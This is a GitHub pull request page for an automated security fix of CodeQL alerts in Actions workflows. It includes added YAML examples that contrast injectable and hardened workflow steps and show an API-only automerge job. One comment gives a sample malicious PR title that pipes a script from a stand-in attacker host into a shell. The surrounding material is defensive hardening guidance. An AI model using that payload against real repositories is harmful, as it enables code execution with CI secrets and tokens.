
🔒 Security Auto-Fix: CodeQL Alerts #47

Closed
xaostech-security[bot] wants to merge 1 commit into main from security/autofix-1771725171

Conversation

@xaostech-security (Contributor)

Automated Security Fixes

This PR contains automatic fixes for security alerts detected by CodeQL.

Alerts Addressed:

  • [ERROR] actions/untrusted-checkout/high: .github/workflows/automerge.yml:266
  • [ERROR] actions/untrusted-checkout/high: .github/workflows/automerge.yml:235
  • [WARNING] actions/code-injection/medium: .github/workflows/validate-pr.yml:75
  • [WARNING] actions/code-injection/medium: .github/workflows/validate-pr.yml:74
  • [WARNING] actions/code-injection/medium: .github/workflows/central-loader.yml:145
  • [WARNING] actions/code-injection/medium: .github/workflows/central-loader.yml:144
  • [WARNING] actions/code-injection/medium: .github/workflows/central-loader.yml:142
  • [WARNING] actions/code-injection/medium: .github/workflows/central-loader.yml:141
  • [WARNING] actions/code-injection/medium: .github/workflows/central-loader.yml:140
  • [WARNING] actions/code-injection/medium: .github/workflows/central-loader.yml:139
  • [WARNING] actions/code-injection/medium: .github/workflows/central-loader.yml:138
  • [WARNING] actions/code-injection/medium: .github/workflows/central-loader.yml:137
  • [WARNING] actions/code-injection/medium: .github/workflows/central-loader.yml:136
  • [WARNING] actions/code-injection/medium: .github/workflows/central-loader.yml:143
  • [WARNING] actions/code-injection/medium: .github/workflows/central-loader.yml:143
  • [WARNING] actions/code-injection/medium: .github/workflows/central-loader.yml:113
  • [WARNING] actions/code-injection/medium: .github/workflows/central-loader.yml:106
  • [WARNING] actions/code-injection/medium: .github/workflows/central-loader.yml:102
  • [WARNING] actions/code-injection/medium: .github/workflows/central-loader.yml:108
  • [WARNING] actions/code-injection/medium: .github/workflows/central-loader.yml:101
  • [WARNING] actions/code-injection/medium: .github/workflows/central-loader.yml:103
  • [WARNING] actions/unpinned-tag: .github/workflows/central-loader.yml:234
  • [WARNING] actions/unpinned-tag: .github/workflows/test.yml:47
  • [WARNING] actions/unpinned-tag: .github/workflows/bash-lint-advanced.yml:173
  • [ERROR] actions/untrusted-checkout/high: .github/workflows/automerge.yml:135

Changes Made:

  • Extract GitHub Actions context variables to environment variables
  • Pin unpinned third-party actions to commit SHAs
  • Quote shell variables to prevent code injection

Verification Needed:
Review required - validate that fixes don't break workflow functionality


Auto-generated by security-autofix workflow
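The three items under "Changes Made" are the standard hardening for the `actions/code-injection` and `actions/unpinned-tag` alert classes. The workflow below is an added example written for this page, not the project's `validate-pr.yml` or `central-loader.yml` (whose contents are not visible here); the workflow, job and step names are hypothetical, `some-org/some-action` is a placeholder, and the 40-hex commit SHA is a placeholder rather than a real release commit. It shows the vulnerable shape beside the hardened one so the difference is concrete.

```yaml
# Added example (not from the PR under review). Workflow, job and step names
# are hypothetical; some-org/some-action and the commit SHA are placeholders.
name: validate-pr-example
on:
  pull_request_target:          # runs with repository secrets, so every PR field is hostile input
    types: [opened, edited, synchronize]

permissions:
  contents: read
  pull-requests: read

jobs:
  validate:
    runs-on: ubuntu-latest
    steps:
      # BEFORE (vulnerable, kept here only to show the pattern CodeQL flags):
      # the ${{ }} expression is expanded by the runner *before* the shell sees
      # the script, so a PR title such as
      #   $(curl https://attacker.example/x | sh)
      # is spliced into the command line as code. Quoting inside the script
      # does not help; the substitution happens at the template level.
      - name: Check title (unsafe)
        run: |
          echo "Validating ${{ github.event.pull_request.title }}"
          echo "${{ github.event.pull_request.body }}" | grep -q 'Closes #'

      # AFTER (hardened): untrusted values go through environment variables.
      # The shell then expands "$PR_TITLE" as data, never as code, as long as
      # the variable is double-quoted and not fed to eval / sh -c.
      - name: Check title (hardened)
        env:
          PR_TITLE: ${{ github.event.pull_request.title }}
          PR_BODY: ${{ github.event.pull_request.body }}
        run: |
          echo "Validating $PR_TITLE"
          printf '%s\n' "$PR_BODY" | grep -q 'Closes #'

      # BEFORE: a mutable tag. Whoever can move the tag decides what code runs
      # with this job's token and secrets.
      - uses: some-org/some-action@v1

      # AFTER: an immutable commit SHA, with the tag kept in a comment so
      # Dependabot or Renovate can still propose bumps.
      - uses: some-org/some-action@0123456789abcdef0123456789abcdef01234567 # v1.2.3 (placeholder SHA)
```

To find candidates by hand, `grep -n '\${{' .github/workflows/*.yml` lists every expression; a hit on a `run:` or `script:` line that references `github.event.*`, `github.head_ref` or another field a PR author controls is the same condition the CodeQL query reports. The `env:` move is only a fix when the variable is used quoted; passing it to `eval`, interpolating it into a second script, or writing it into a file that is later sourced reintroduces the injection.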

xaostech-security[bot] added the labels security (Security-related changes) and automated (Automated changes) on Feb 22, 2026
xaos-bot closed this on Feb 22, 2026
xaoscience added a commit that referenced this pull request Feb 22, 2026
Replace git-based merge operations with GitHub API merge to eliminate
code injection risks. Follows GitHub Security Lab zero-trust pattern:
privileged workflows must never checkout untrusted PR code.

Changes:
- Merge PR from workflow_run: Use github.rest.pulls.merge() API
- Merge PRs from manual/anglicise: Use github.rest.pulls.merge() API
- Remove GPG signing requirement (API doesn't support custom signatures)
- Remove redundant API fallback step (all merges now use API)
- Remove git fetch/merge operations that accessed untrusted PR refs

Fixes CodeQL alerts #47, #50 (untrusted-checkout/high)
Alert #8 appears to be a false positive - guard job never checks out PR code

Addresses issue #95
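The commit message describes the GitHub Security Lab pattern for `workflow_run` automation: the privileged job never checks out the PR head and merges through the REST API instead. The workflow below is an added example that is not the project's `automerge.yml`; the triggering workflow name ("CI"), the job name, the squash merge policy and the `actions/github-script` commit SHA are placeholders, and resolving fork PRs through `listPullRequestsAssociatedWithCommit` is an assumption about how the repository wants to handle fork-originated runs.

```yaml
# Added example (not the project's automerge.yml). The workflow name, job
# name, merge policy and the action's commit SHA are placeholders.
name: automerge-example
on:
  workflow_run:
    workflows: ["CI"]            # the unprivileged workflow that ran on pull_request
    types: [completed]

permissions:
  contents: write                # merging a PR needs contents:write ...
  pull-requests: write           # ... and pull-requests:write

jobs:
  merge:
    # Only act on successful runs that were triggered by a pull_request event.
    if: ${{ github.event.workflow_run.conclusion == 'success' && github.event.workflow_run.event == 'pull_request' }}
    runs-on: ubuntu-latest
    steps:
      # Deliberately NO actions/checkout and NO `git fetch origin pull/N/head`
      # here: a workflow_run job carries the repository's write token, so any
      # local merge of the PR head would run PR-contributed hooks, scripts or
      # Makefile targets with that token. Everything below goes through the API.
      #
      # Also note that nothing is interpolated into `script:` with ${{ }};
      # ${{ }} inside github-script is JavaScript injection. All event data is
      # read from the `context` object at runtime.
      - name: Merge via the REST API
        uses: actions/github-script@0123456789abcdef0123456789abcdef01234567 # v7.x.y (placeholder SHA)
        with:
          script: |
            const run = context.payload.workflow_run;
            const { owner, repo } = context.repo;

            // For same-repository PRs GitHub populates workflow_run.pull_requests;
            // for fork PRs it is empty, so fall back to resolving by head SHA
            // (assumption: the repo wants fork PRs handled at all).
            let pr = run.pull_requests[0];
            if (!pr) {
              const { data } = await github.rest.repos.listPullRequestsAssociatedWithCommit({
                owner, repo, commit_sha: run.head_sha,
              });
              pr = data[0];
            }
            if (!pr) {
              core.info('No pull request associated with this run; nothing to merge');
              return;
            }

            // Re-read the PR from the API rather than trusting the event copy,
            // and refuse if the head moved after CI validated it.
            const { data: fresh } = await github.rest.pulls.get({ owner, repo, pull_number: pr.number });
            if (fresh.head.sha !== run.head_sha) {
              core.setFailed(`PR #${pr.number} head changed after CI (${fresh.head.sha} != ${run.head_sha})`);
              return;
            }

            // `sha` makes the server reject the merge if the head no longer
            // matches the commit CI ran against (TOCTOU guard on the API side).
            await github.rest.pulls.merge({
              owner, repo,
              pull_number: pr.number,
              sha: run.head_sha,
              merge_method: 'squash',
            });
            core.info(`Merged #${pr.number} at ${run.head_sha}`);
```

Two caveats the commit message implies but does not spell out: the API merge is signed by GitHub's web-flow key, which is why the GPG signing step had to go, and `workflow_run` fires for every completed run, including runs for pull requests from forks, so the merge job must still enforce whatever approval, label or author policy the repository requires before calling `pulls.merge`; the example leaves that policy check out.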
@xaoscience xaoscience deleted the security/autofix-1771725171 branch February 23, 2026 19:08